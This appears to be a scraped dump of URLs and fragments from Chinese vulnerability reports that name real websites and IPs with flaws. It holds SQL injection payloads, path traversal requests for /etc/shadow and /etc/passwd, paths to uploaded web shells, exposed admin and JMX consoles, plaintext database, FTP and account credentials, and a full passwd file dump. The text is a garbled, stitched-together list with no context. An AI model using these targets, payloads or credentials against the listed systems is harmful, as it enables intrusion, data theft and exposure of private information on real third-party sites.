http://**.**.**/Home/LogIn http://www.ztesun.com/admin/login.asp http://www.ztesun.com/about.asp?id=1 http://www.ztesun.com/productshow.asp?id=44&sid=46&keyword= http://www.doit.com.cn/api.php?op=news_more&start=1&siteid=1 http://**.**.**.**/web/newsAction!loadNews.action?newsId=402880a03d857fa3013d86d086f30004 URL:http://**.**.**.**/spAppoExamine/spAppoExamine!examineListAll.action?domainCode=nt¶mSP= URL:http://**.**.**.**/portel/showNoticeIndexINfo.action?id=2901&categoryId=4 http://**.**.**.**:8080/wz-article!detail.action?id=8825&typename=wz http://**.**.**.**/ContentAction_getContent.action?id=4340812A3198434E9BCF59EDF2B9367C URL:http://**.**.**.**/xinwen/index.action https://i.genshuixue.com/forget https://i.genshuixue.com/forgotpwd/code.do https://**.**.**.**/login/yzemail?email=1234563@**.**.**.** http://202.198.17.28/swsysfzx/admin/login.php http://zhaosheng.nynu.edu.cn/zsw/ajax.ashx?action=ysquery&gkbmh=1&rand=0.4010385440196842&sfzh=e&yszkzh=e http://**.**.**.**/book.aspx?taskno=024002 http://**.**.**.**/fwpt/shownews.asp?id=229&xxfl=3 http://lib.hrbeu.edu.cn/x/sjk.asp?id=304 http://archives.hrbeu.edu.cn/pub/search/default.asp?id=28 http://chengeng.hrbeu.edu.cn/showarticle.php?articleid=531 http://job.hrbeu.edu.cn/admin1/info/typeinfo.asp?infotype=%CD%A8%D6%AA%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&typeid=47 http://gxpt.hrbeu.edu.cn/model/twogradepage/devTrans.aspx?devcode=%7BSchoolNo%7D http://jxpj.hrbeu.edu.cn/1.jsp密码 http://ysszfj.hrbeu.edu.cn/1.jsp http://hr.hrbeu.edu.cn/downLoadFile.do?filename=hhr-configMVC.xml&filepath=WEB-INF/config/ http://www.fjbs.gov.cn/userCenter.action?fn=passwordBackCheckUserPage http://**.**.**.**/about.asp?AsSortID=1 http://**.**.**.**/newsinfo.asp?id=530 http://**.**.**.**/physical.php?cat_pid=23&cat_id=24 http://**.**.**.**/DeptLogin.aspx http://**.**.**.**/std/ http://wkd.edaijia.cn/。用数据库工具连接123.56.47.59:3306,账号是root,密码是root,登录后可看到数据库内部表和表内容。 http://www.gannanxian.org/CMSUploadFile.aspx http://bink.gq/CMSUploadFile.aspx http://bink.gq/CMSUploadFile.aspx http://tp.huaxi88.com/CMSUploadFile.aspx http://sns2.maticsoft.cn/CMSUploadFile.aspx http://sns3.maticsoft.cn/CMSUploadFile.aspx http://www.weichimei.com/CMSUploadFile.aspx http://miguajie.com/CMSUploadFile.aspx http://ipangda.com/CMSUploadFile.aspx http://kbfsshop.gotoip1.com/CMSUploadFile.aspx http://www.hzskate.com/CMSUploadFile.aspx http://mall.66jyw.com//CMSUploadFile.aspx http://xiangyig.com/CMSUploadFile.aspx http://www.remaigou.com/CMSUploadFile.aspx http://adsm.qq.cc/CMSUploadFile.aspx http://shishangliangli.com.cn/CMSUploadFile.aspx http://fanjian83.com/CMSUploadFile.aspx http://localhost:8080/CMSUploadFile.aspx http://**.**.**.**:7003/sungov/findpwd.do http://mark.ad.sogou.com/ http://mark.ad.sogou.com/mark/remark?userid=28&taskid=2707 http://**.**.**.**/sbzs.php?classid=29 http://**.**.**.**/test.php http://**.**.**.**:8081/apps/xqp2/pages/workflows/report/ReprotTrackingWorkflows.aspx?statrtime=2011-07-28&endtime=2015-08-27&dptName=%E7%BD%91%E7%BB%9C%E5%85%AC%E5%8F%B8%E7%BD%91%E7%BB%9C%E5%BB%BA%E8%AE%BE%E9%83%A8&type=1 http://www.secwk.com/uploads/ http://www.secwk.com/uploads/upload/renzheng/ http://www.secwk.com/uploads/upload/renzheng.tgz http://www.secwk.com/uploads/bmzcert/month_1508/ http://www.secwk.com/uploads/imgupload/ http://121.193.130.41/rs_recruit/HR4001Action.do?param=applicantRegisterType http://www.tingbook.com:80/Activity.rar http://www.tingbook.com:80/user.rar http://**.**.**.**/,新华网思客平台存在sql注入漏洞,通过注入可获取到大量用户账户信息。 http://www.haohaizi.com/ http://vip.kuwo.cn/vip/jsp/login.jsp?status=4这个接口是酷我vip的一个登陆接口,登陆位置未做登陆验证机制 URL:http://61.183.121.210:9113/login/Login.jsp?logintype=1 http://www.yunguanche.com/workspace.shtml http://mo.gw.com.cn//iCooperateHtml.php?pageurl=http://127.0.0.1:22/ shell:http://rd.haierpeople.cn/Upload/b_201508271329172.asp http://passport2.chaoxing.com/admin/ http://g.baofeng.com/special/api/zonelist.json?order=2&shortname=jjsg%22%20AND%203*2*1%3d6%20AND%20%22000DV8Q%22%3d%22000DV8Q&status=2 http://www.fsrqxh.com/current/Login http://**.**.**.**/accNet/findPass.html?r=0.032482340931892395 http://**.**.**.**/user/index.html http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/bg/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/ http://**.**.**.**/vote/vote.asp?id=35 http://219.143.118.86/ http://180.97.2.9/.svn/entries http://180.97.2.9/.svn/text-base/ugv.war.svn-base http://iposs.sdinfo.net/ldims/szxAssess/szxAssessAction!queryPon.action?city_id=08000104&successFlag=0&statsDate=2015-04-01&endDate=2015-04-30 http://iposs.sdinfo.net/ldims/szxAssess/szxAssessAction!queryPon.action?city_id=08000106&successFlag=0&statsDate=2015-01-01&endDate=2015-05-05 http://113.247.255.18:8000/general/vmeet/wbUpload.php http://113.247.255.18:8000/general/vmeet/1.php http://60.**.1*.** http://60.1#.#5.1#:7001/jmxroot/jmxroot.jsp jdbc:oracle:thin:@192.168.55.185:1521:orcl pass:t*** jdbc:oracle:thin:@192.168.54.86:1521:orcl jdbc:oracle:thin:@192.168.54.253:1521:orcl jdbc:oracle:thin:@192.168.53.26:1521:oradepl jdbc:oracle:thin:@192.168.53.51:1521:ora10g jdbc:oracle:thin:@192.168.54.150:1521:ora10g http://**.**.**.**/project.php?id=34 https://github.com/cobin/selfProxyStock/blob/07596f9bdec972a7edf1f139bdf66a51e86b4b04/lib/sendmail.js http://www.foamka.me/bpcrm_coffee/weixinportal/ http://huaweimossel.com/user.php?act=login https://code.csdn.net/topthink2011/ThinkPHP/merge_requests?direction=desc&sort=1 http://switch.17u.cn/UpdateHotelRooms.aspx http://switch.17u.cn/Log.aspx http://218.66.104.28:308/chuli.aspx?s=0.09647750668227673&oper=cha_jieguo&p1=9&p2=90 https://jf.ffan.com http://www.21boya.cn https://www.tzbao.com/ https://www.tzbao.com/auth/memberAction!submitInfo.jspx http://img.tzbao.com/RRmwT03073.html ftp://navigator:hisensoft@218.58.78.181 ftp://navigator:hisensoft@222.173.107.70 ftp://navigator:hisensoft@218.58.78.146 http://**.**.**.**/om https://rcp.damai.cn/por/login_psw.csp?rnd=0.004662641091272235#https%3A%2F%2Frcp.damai.cn%2F https://rcp.damai.cn/com/setup.html?4 www.damai.cn http://106.39.51.192/ http://**.**.**.**/jdh?code=bqxl http://180.169.30.13:2046/ajax/getemaildata.php?DontCheckLogin=1&filePath=../version.txt http://180.169.30.13:2046/ajax/getemaildata.php?DontCheckLogin=1 http://180.169.30.13:2046/tmpfile/upd2134.tmp.php http://prm.yonyou.com/login/login.php http://180.169.30.13:2046/login/login.php http://112.64.196.14/login/login.php http://crm.naide.com.cn/login/login.php http://crm.szclou.com:8088/login/login.php http://crm.szclou.com:8088/login/login.php http://119.6.104.10:7788/wap/login_wap.php http://qinyuancrm.com/login/login.php http://111.207.244.5:8888/login/login.php http://crm.transn.net/login/login.php http://etools1.bitp.cn:2000/login/login.php https://crm.itrus.com.cn/login/login.php http://kfdq369.gicp.net/login/login.php http://www.kdlian.com:8001/login/login.php https://crm.itrus.com.cn/login/login.php http://prm.chanjet.com/login/login.php http://xlcrm.tbea.com.cn:8088/login/login.php http://prm.ufida.com.cn/login/login.php http://crm.elfa.com.cn/login/login.php http://work.tju.edu.cn/ http://work.tju.edu.cn/notice_content.php?id=35 http://api.breadtrip.com/trips/2387122224/waypoints/ http://api.breadtrip.com/trips/2387122223/waypoints/ http://api.breadtrip.com/trips/2387122214/waypoints/ http://api.breadtrip.com/trips/2387122215/waypoints/ http://**.**.**.**:8088/gallery.php?id=3 http://**.**.**.**:8088/manage/ http://**.**.**/DrcomManager/login.doP=logincor http://ipay.so/ https://**.**.**/himyxia/shell/blob/master/connect_ssh.sh ay.so/Q***** http://fxs.cnfol.com/ http://fxs.cnfol.com:80/ gps.wcagps.com/en www.gcwgps.com www.1688gps.hk www.yibugps.com http://rss.dongfeng-nissan.com.cn/login.aspx http://j.news.163.com/docs/4/2015081620/B15O8DM190018DM2.html http://service.mtime.com/存在sql注入漏洞,可脱库获取到很多个数据库的信息。 var:page=connected&var:retag=1 var:page=connected&var:retag=1 var:page=connected&var:retag=1 var:page=connected&var:retag=1 var:page=connected&var:retag=1 var:page=connected&var:retag=1 var:page=connected&var:retag=1 var:page=connected&var:retag=1 var:page=connected&var:retag=1 var:page=connected&var:retag=1 var:page=connected&var:retag=1 name:getpage value:html/index.html name:var:page value:connected name:var:retag http://**.**.**.**/TR/xhtml1/DTD/xhtml1-transitional.dtd http://**.**.**.**/1999/xhtml http://**.**.**.**/license/login.php url:http://iufo.fjtic.cn:9090/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://puppetmaster.chinacache.com:8000/ http://puppetmaster.chinacache.com:8000/demo.sh http://119.90.1.204/wr/ http://42.62.25.8:9090/yufeng/ http://www.sxtv6.com http://**.**.**/ http://www.rufengda.com/front/queryServiceLocation.do https://github.com/ptzhuf/learning/blob/master/pay_stats-pay.properties https://github.com/ptzhuf/learning/blob/master/17ay_pay.properties http://106.39.17.117:8088/ESSSWebII/ www.sjjx.uestc.edu.cn/Index/newsshow/5 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/system/login.jsp http://**.**.**.** http://**.**.**.**/FindBackPwd.aspx http://**.**.**.**/ http://**.**.**.**/search.asp?KeyWord=88952634&page=1 http://git.goodaysh.com/Benz.Huang/rrs-mall/commit/2ae19cfe419e513f0d3ff7d15d930e71bb6be2d6.patch http://**.**.**.**/extmail/cgi/index.cgi?error=msg&__mode=show_login http://**.**.**/index.jsp http://**.**.**/console/ http://wx.pp.cc/wb_u/login https://exchange.chanjet.com/ https://github.com/viekst/python-code/blob/master/Exchange_Address_Export.py http://**.**.**.**/.svn/entries http://**.**.**.**/demo/mysql/ http://www.ctnma.cn/ioop-bcs-web/sys/sys-pwd-question!check.do http://**.**.**.**/ http://**.**.**.**:80/synthReports/wt/questionActionlist2.action?selinput=1 http://t.95105555.com:9001/manager/html http://drops.wooyun.org/tips/604 http://tcmobileapi.17usoft.com/memberextend/ http://tcmobileapi.17usoft.com/flight/orderhandler.ashx http://www.ctfeshop.com.cn/ http://www.ctfeshop.com.cn/user/address.aspx?oid=113588 http://218.107.49.180/ http://tkkw.crtvu.cn/ http://tkkw.crtvu.cn/unitiveexam/report/studentexamcard.aspx?_batchid=26&_studentcode=681 https://121.10.200.39/cgi-bin/webproc https://121.10.200.40/cgi-bin/webproc https://121.10.200.144/cgi-bin/webproc https://121.10.200.145/cgi-bin/webproc https://121.10.200.146/cgi-bin/webproc https://121.10.200.148/cgi-bin/webproc https://121.10.200.149/cgi-bin/webproc https://121.10.200.151/cgi-bin/webproc https://121.10.200.153/cgi-bin/webproc https://121.10.200.155/cgi-bin/webproc https://121.10.200.157/cgi-bin/webproc https://121.10.200.159/cgi-bin/webproc https://121.10.200.161/cgi-bin/webproc https://121.10.200.162/cgi-bin/webproc https://121.10.200.163/cgi-bin/webproc https://59.35.31.239/cgi-bin/webproc https://113.86.163.35/login_zdc.htm https://113.86.163.46/login_zdc.htm https://113.86.163.55/login_zdc.htm https://113.86.163.183/login_zdc.htm https://113.86.184.106/login1.htm https://113.86.184.112/login1.htm https://113.107.192.45/login_zdc.htm https://113.107.192.131/login_zdc.htm https://113.107.192.6/login1.htm https://113.107.192.81/login1.htm https://113.107.192.138/login1.htm https://113.107.192.205/login1.htm http://**.**.**.**/kebiao_info.asp?ID=456 http://**.**.**.**:3333 http://**.**.**.**/index.html http://zhaopin.chd.com.cn/hr/jobinfo.jsp?id=7927 http://zhaopin.chd.com.cn/hr/jobinfo.jsp?id=7927 http://zhaopin.chd.com.cn/hr/jobinfo.jsp?id=7927 http://wlyxxy.open.com.cn/%E8%AF%BE%E7%A8%8B%E5%AD%A6%E4%B9%A0.html http://wlyxxy.open.com.cn/课程学习详细页.aspx?courseid=70ce6e62-c34c-49fa-8cb9-b1ac755f8528 www.dichan.com http://yuanda.zhongyuanauto.com/news.php?id=2 http://car.zhongyuanauto.com/brand.php?relevance=toyota http://www.zhongyuanauto.com/about.php?t=introduction dhgate.com/123456 mall.jzq001.com/plugin.php?id=mall&type=shop_search&classid=1829&sortk=addtime&sortv=desc&typeid=1831 http://sunny.dongfeng-nissan.com.cn/usedcaradmin/login.php http://**.**.**.**/content.php?bId=2&mId=2 http://**.**.**.**/phpinfo.php http://**.**.**/ http://hr.yto56.com.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/shadow http://hr.yto56.com.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../root/.bash_history http://hr.yto56.com.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../opt/IBM/WebSphere/AppServer/profiles/AppSrv01/logs/ncMem03/SystemOut.log http://r.ele.me/restapi/v1/restaurants/hlrgm?extras[]=identification http://r.ele.me/restapi/v1/restaurants/ay-cwlmd?extras[]=identification http://120.132.133.83/Login.aspx?returnurl=http%3a%2f%2f120.132.133.83%2fdefault.aspx&conv=84cbb4de-28a9-41e7-bc17-ff51a8257065 www.smartapp4u.com http://www.smartapp4u.com http://cloud.bbn.com.cn:8081/shoppingcart!cartQty.action http://nic.hitsz.edu.cn/mingx.php?id=30 http://www.mca.gov.cn http://www.mca.gov.cn/shell.jsp https://www.batiaoyu.com/ http://**.**.**.**/yyoa/common/SelectPerson/reloadData.jsp http://**.**.**/manage/Main.aspx http://sy.uxin.com/ http://**.**.**/discuz/ http://eduadmin.open.com.cn/login.aspx?Pwd=qxt8324057&URLFrom=open&UserName=qingxt http://js171.com/admin http://www.tourongdai.com/ http://**.**.**.**/ftoa/login http://**.**.**/nsmail/index.php www.darryring.com http://www.darryring.com/nAPI/AddressInfo.ashx?action=getbyid&id=70000 http://111.206.75.119/ http://111.206.75.119/ips-table/ip-cyou.txt http://111.206.75.119/updown/bbs.ds.changyou.com.tgz http://111.206.75.119/updown/adminzsx/discuz_ds.sql http://111.206.75.119/updown/tomcat-7.tgz http://**.**.**.**/web/login.aspx http://**.**.**.**/web/121_1.aspx?tt=1&dbname=国税局_国税局个体户达起征点认定信息表&xq=全部县区&startdate=2015-08-01&enddate=2015-08-28&inf_status=有效&pro_status=全部状态 http://**.**.**.**/tianjinlawyermanager/justice/guide/show.jsp?infoID=IC02000007421 http://www.siridamedia.com/news_detail.php?id=489 www.siridamedia.com http://**.**.**.**/villa/buildinginfor.aspx?id=656 http://**.**.**.**/villa/buildinginfor.aspx?id=656 http://www.loveindds.com/asp/upfile.asp http://**.**.**.**/ http://**.**.**.** http://bable.weimob.com/上各种传jsp文件都不被执行,紧接着在http://bable.weimob.com/pages/viewpage.action?pageId=4587846找到了一些有意思的信息。 weimob.com/a123456登陆http://ticket.weimob.com/平台,成功登陆,而且使管理员权限 http://www.weimob.com/ http://bbs.weimob.com/,可自行登陆 www.smartapp4u.com http://www.smartapp4u.com http://**.**.**.**/ http://newkm.cofco.com/ http://nhribpm.cofco.com/ http://nhribook.cofco.chaoxing.com/ http://voc.cofco.com http://c3.cofco.com http://**.**.**.**/view.php?sid=36 http://chao.weixinlc.cn http://qc.light.soufun.com/ http://**.**.**.**/2015/M_classContent.aspx?cid=143 http://**.**.**.**/HuirenWeb/ProductC.aspx?menuname=A02&ShowMenuName=A0203&Kind=DICT0000000064 http://**.**.**.**/Main.aspx# http://**.**.**.**/Main.aspx# http://**.**.**.**/ http://**.**.**.**/xxsearch.action存在SQL注入漏洞,命令如下: http://**.**.**.**/xxsearch.action https://account.13980.com/account/CheckfindPassword1 https://account.13980.com/account/checkfindPassword3 https://account.13980.com/account/CheckfindPassword1 https://account.13980.com/account/checkfindPassword3 https://account.13980.com/member/modifyPhone4 https://account.13980.com/member/modifyPhone5 https://account.13980.com/member/modifyEmail4 https://account.13980.com/member/modifyEmail5 http://gouser.3g.net.cn//userManage/userjson/searchUserbySystemid.action http://**.**.**.**/count.php?aid=1&v=2 http://m.ffan.com http://www.rufengda.com/page/user/user_register.jsp http://**.**.**.**/.svn/entries http://hq.fruitday.com:88/page/element/Weather/View.jsp?ebaseid=weather&eid=5*&styleid=1%27&hpid=4%27&subCompanyId=1%27&e71415018052415=%27 http://reci.zhenai.com/ http://60.10.8.227:88/login/Login.jsp?logintype=1 http://60.10.8.227:88/page/element/Weather/View.jsp?ebaseid=weather&eid=5*&styleid=1%27&hpid=4%27&subCompanyId=1%27&e71415018052415=%27 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin avahi:x:70:70:Avahi Stack:/var/run/avahi-daemon:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin ldap:x:55:55:LDAP User:/var/lib/ldap:/sbin/nologin mysql:x:500:500::/home/mysql:/bin/bash www:x:501:501::/home/www:/bin/bash hadoop:x:502:502::/home/hadoop:/bin/bash rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin tomcat:x:91:91:Apache Tomcat:/usr/share/tomcat6:/sbin/nologin http://union.xunlei.com/ http://**.**.**.**/bszn.php?classid=5 http://**.**.**.**/goods/detail!orderDetail?orderInfo.webOrder=ECZD1502111637383YYHGI http://web.7k7k.com/ http://web.7k7k.com:80/ http://**.**.**.**/db/admin.php http://www.flyertea.com/newcomment/index.php/Index/Search/index.html?checkin=&checkout=&keyword=&order=1&type= http://www.lcsd.gov.hk/tc/facilities/facilitieslist/districts.php?ftid=46 http://119.134.251.102/console/ http://**.**.**.** http://**.**.**.**/zengxian/files/upfile/2-1.asp http://www.wjgcxy.com/article.asp?id=703 http://**.**.**.**/bugs/wooyun-2015-0125506 http://**.**.**.**/chengguo.asp?action=zhanshi&id=2 http://city.jia.com/index.php?areaflag=1 http://oa.kdnet.net/ http://172.18.15.2:6080 https://github.com/filemerge/Utils/blob/ef1571ed590d8491b8a251349eb6c317246fb6bc/.svn/pristine/aa/aa25380d62a9b661f89cc3b410ef5df6fddb9a23.svn-base https://**.**.**.**/poeao/HaitaoRepos/blob/694b0cfc54502302212a8096a626004e9989ab04/env/Servers.txt http://sparepart.dfac.com sparepart.dfac.com/invoker/JMXInvokerServlet http://bank.pingan.com/uddiexplorer/ http://bank.pingan.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://baidu.com&rdoSearch=name&txtSearchname=&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://123.232.100.133:8080/WEBOA/control/main http://123.232.100.133:8080/jmx-console/ http://123.232.100.133:8080/web-console/ http://123.232.100.133:8080/invoker/JMXInvokerServlet http://www.4008000000.com/ http://www.4008000000.com/uddiexplorer/SetupUDDIExplorer.jsp http://pa18-padwebDMZ9115.instance.paic.com.cn:30351&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://**.**.**.**/login.aspx?ReturnUrl=%2f http://**.**.**.**/fwpt/scfl.asp?id=54 http://www.pifii.com/ encap:Ethernet E8:4C:C9:D1 addr:113.106.98.92 Bcast:113.106.98.95 Mask:255.255.255.248 e8ff:fe4c:c9d1/64 Scope:Link MTU:1500 packets:95221119 packets:56340346853 txqueuelen:1000 http://**.**.**.**/login.php http://**.**.**.**/login.php http://**.**.**.**/defaultroot/voiture_manager/Voituregetsource.jsp?voitureid=696360&type=chgMotorMan,参数voitureid存在注入 http://113.106.83.122/ReferWebV2/ http://sem.baidu.com/site/forgetone http://dmoa.cofco.com/seeyon/index.jsp http://**.**.**.**/share/.svn/entries http://film.ffan.com/filmSeat/checkSceneTime?sceneNo=20150828094010469005 http://film.ffan.com/filmSeat/checkSceneTime?sceneNo=20150828094010469005 http://**.**.**.**/ http://**.**.**.**:80//index.php?a=init&c=index&cid=1&m=search&mid=13&q=1&siteid=1&typeid=54 http://xxxx/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://**.**.**.**/login/wooyun.jsp http://**.**.**.**/wooyun.jsp http://**.**.**.**:88/wooyun.jsp http://**.**.**.**:9000/**.**.**.** http://mml.sjtu.edu.cn/xwnr.php?newsID=139,此注入点不好检测,需指定注入技术,否则检测不出。 http://mml.sjtu.edu.cn/xwnr.php?newsID=138 http://**.**.**.**/login.aspx http://pos.hisense.com/cn/ http://yjs.nchu.edu.cn/leadmail.asp?id=564 http://tiyu.nchu.edu.cn/type.asp?id=3 http://kyc.axhu.cn/xsc/show.php?ID=26176 http://sie.nchu.edu.cn/channel/content.asp?id=643 http://qk.nchu.edu.cn/showall.asp?id=4 http://zdh.nchu.edu.cn/admin/imgout.asp?id=1 http://www.sttacas.org/xieyijianjie_new.php?id=217 http://wooyun.org/bugs/wooyun-2015-0136465 http://mys8.super8.com.cn:81/Login.aspx http://www.diamondsfx.com/zh-cn/read.jsp?id=48如图所示: https://f.infinitus.com.cn/notice/init.action?noticeType=1 http://**.**.**.**/ http://about.kdnet.net//download.php?file=../../../../../../../../../../etc/passwd root:/***** bin:/sbi***** sbin:/sb***** adm:/sb***** lpd:/s***** sbin:/***** wn:/sbin:/s***** sbin:/***** ews:/et***** uucp:/***** tor:/root:/***** gopher:/***** ftp:/s***** body:/:/s***** aemon:/:/s***** owner:/d***** user:/:/***** arpwatch:/***** ntp:/sbi***** bus:/:/***** daemon:/:***** SSH:/var/empty***** User:/var/lib***** User:/var/li***** daemon:/:/***** pd:/var/lib/avahi-***** tcache:/:/s***** www:/***** Server:/var/l***** OProfile:/***** ver:/var/lib***** er:/etc/X11/***** gdm:/sbi***** ministrator:/home***** alias:/***** http://wooyun.org/bugs/wooyun-2010-0137629 http://zhaopin.chd.com.cn/admin/displayresume.jsp?id=200存在报错注入 http://zhaopin.chd.com.cn/hr/jobsinfo.jsp http://www.xine95533.com/ http://www.xine95533.com/admin/login.php http://211.151.249.76:81/zentao/user-login-L3plbnRhby8=.html http://**.**.**.**/TechFinance/kjjrWeb/kjjrWebAction_getNewsInfoById jboss-5.0.0.GA/server/default/deploy/TechFinance.war/ www.10020.net http://222.174.125.19:8081/login.d http://222.174.125.19:8082/login.aspx http://222.174.125.19:8082 http://yt.linekong.com/lookvote.php?vote_id=33 http://jxxy.fzu.edu.cn/index.php/Index/view/id/4417.html http://jxxy.fzu.edu.cn/index.php/Index/view/id/4417'.html http://**.**.**.**/bugs/wooyun-2015-0125437 http://**.**.**.**/ziping.asp?action=pici&id=1 http://www.gdut.edu.cn/newgdut/gdutyx.htm http://**.**.**.**/ http://bangong.aili.com/main.php?m=member&s=admin_orderadder&id=2&type=edit http://bangong.aili.com/main.php?m=member&s=admin_orderadder&edid=20 http://bangong.aili.com/config/ http://bangong.aili.com/includes/ http://bangong.aili.com/log/ http://bangong.aili.com/uploadfile/ http://**.**.**.**/homeAction/getNewsShowAction.action http://its.zte.com.cn/univ/login.aspx http://its.zte.com.cn/univ/ElearningFiles/DL_CLASS_PIC/201508/x.aspx http://**.**.**.**/searchapi.htm http://**.**.**.**:8080/mim/login.jsp http://**.**.**.**:8080/mim/core/ckeditor/cKEditorUpload!downLoadImg.action?imgPatch=../../../../../etc/passwd http://**.**.**.**:8080/mim/core/ckeditor/cKEditorUpload!downLoadImg.action admin:axis2 http://sms.exintong.net:9038/axis2-web/ http://e.dangdang.com/bbs/uc_server http://www.smartapp4u.com/androidService/announcement/toEdit.h?id=11 http://**.**.**.**/findArticle?articleId=222&type=findone http://60.217.235.66:8080/backup_20130826.rar http://61.163.182.31:7001/commons/main/mainframe.html http://61.163.182.31:80 http://61.163.182.31/His/Login.htm http://www.gpsoo.net/index.shtml http://mapoo.10000care.com/user/custCenter.shtml?custid=1000001&remote_url=http%3A%2F%2Fin.gpsoo.net%2F&updateUrl=http%3A%2F%2Fin.gpsoo.net%2F&id=1000346&logout=&locale=zh-cn&type=f&userid=&pid=&is_device=false&lang=&requestSource=&loginUrl=&custname= http://www.kuaipan.cn/ http://jhcard.sinosafe.com.cn/ http://**.**.**.**/Product/List.aspx?ID=10077 http://wooyun.org/bugs/wooyun-2015-0125692 http://106.39.17.117:8080/ http://106.39.17.117:8080/admin-console/ http://106.39.17.117:8080/UUMC/ http://106.39.17.117:8088/ESSSWebII/ http://nt1.300.cn https://61.185.128.190:8443/ims/ http://**.**.**.**/www/index.php?m=user&c=login http://**.**.**/ http://manage.kefu.189.cn:8002/mobileservice/ http://manage.kefu.189.cn:8002/mobileservice/doLogin.html http://manage.kefu.189.cn:8002/mobileservice/ http://**.**.**.**/datasec.php?id=15386& http://**.**.**.**/forum/query.asp?boardid=0 http://m.jobch263.com/ShowJob.asp?id=11931 http://m.jobch263.com/ShowJob.asp?id=11931 http://sqlmap.org http://**.**.**.**/manage/ http://**.**.**.**/index.php/Home/Product/detail/id/2.html http://wooyun.org/bugs/wooyun-2010-041812 http://ac.qfkd.com.cn/FrameMain.htm http://**.**.**.**/index.php/search http://**.**.**.**/ http://**.**.**.**/user/custCenter.shtml?custid=1000001&remote_url=http%3A%2F%2F**.**.**.**%2F&updateUrl=http%3A%2F%2F**.**.**.**%2F&id=1000346&logout=http%3A%2F%2F**.**.**.**%2F&locale=zh-cn&type=&userid=&pid=&is_device=false&lang=&requestSource=&loginUrl=&custname= http://**.**.**.**:81/UserRecordOperation/PulSearch.aspx http://www.myhostadmin.net/ http://www.myhostadmin.net/domain/DomainMana.asp http://**.**.**.**/ http://**.**.**.**/News/Details.aspx?typeid=gnxw&id=2014112516463300001参数ID过滤不严格导致了sql注入 http://shell.cnfol.com/HotArticle/hot.php?catid=3656&num=10&fnc=3&contid=21324863&ctime=2015-08-21%2019:04:45 http://shell.cnfol.com/article/recomend_newjson.php?id=1975&record=4&len=22&call= http://shell.cnfol.com/3gcnfol/iphoneArticle_json.php?classid=3658&start= http://live.3g.cnfol.com/index.php?r=Images/ImgList&type=1&channel=2 http://live.3g.cnfol.com/index.php?r=Images/Comment&num=0&id=17835&newstitle=&channel= http://web.juhe.cn:8080/environment/air/cityair http://web.juhe.cn:8080/constellation/getAll http://web.juhe.cn:8080/finance/stock/hs cn:8080接口请检查 dir:D:\apache-tomcat-7.0.52\webapps\environment\ cmd:whoami https://www.51jiecai.com/forgotpwd.page?6 http://3g.xywy.com/ http://3g.i.xywy.com/index/authUser?act=t_3g_login_vcode&refreshTemp=2&mobile=输入点 http://3g.i.xywy.com/index/authUser?act=t_3g_login_vcode&refreshTemp=2&mobile= http://home.xywy.com/user.php?act=attention&uid=2548777&type=atten&token=166b535a0deadd021b5ada0b392c4bbb http://218.76.40.69/ http://218.76.40.69:8080/ http://special.kdnet.net/bxjs/index.php?a=articlelist&c=bxjs&uid=15348870 http://**.**.**.**/index!doIndex http://**.**.**.**/bugs/wooyun-2014-053199 http://fuss10.elemecdn.com/4/b0/b7d57569b358a2af9ab2c59e4aa03html.html http://file.hiall.com.cn/company.zip http://file.hiall.com.cn/HiAll.zip http://file.hiall.com.cn/新建 http://**.**.**.**/zfxxgk/bzsdw/zjj/201308/P020130822285701029247.xls http://astro.nuaa.edu.cn/wp-content/uploads/2010/09/%E8%88%AA%E5%A4%A9%E5%AD%A6%E9%99%A22010%EF%BC%8D2011%E7%AC%AC%E4%B8%80%E5%AD%A6%E6%9C%9F%E8%8B%B1%E8%AF%AD%E5%88%86%E7%8F%AD.xls http://www.shinetour.com/ResetPassword/FindIndex.aspx http://**.**.**.**:8081/mms3.2/ http://kw.xhd.cn:8080/edus/login_page.do http://**.**.**.**/pwd.aspx http://**.**.**.**/login.html---登录页面 http://**.**.**.**/search/ http://10086.gdmmyd.net/main.jsp可以被直接访问,该页面可能为开发人员未完成页面,访问时会有js错误,但利用burpsuite,把js中的var http://menpiao.suning.com/trip-web/scenic/search.htm?searchKey=%3Ch1%3EXSS%3C/h1%3E 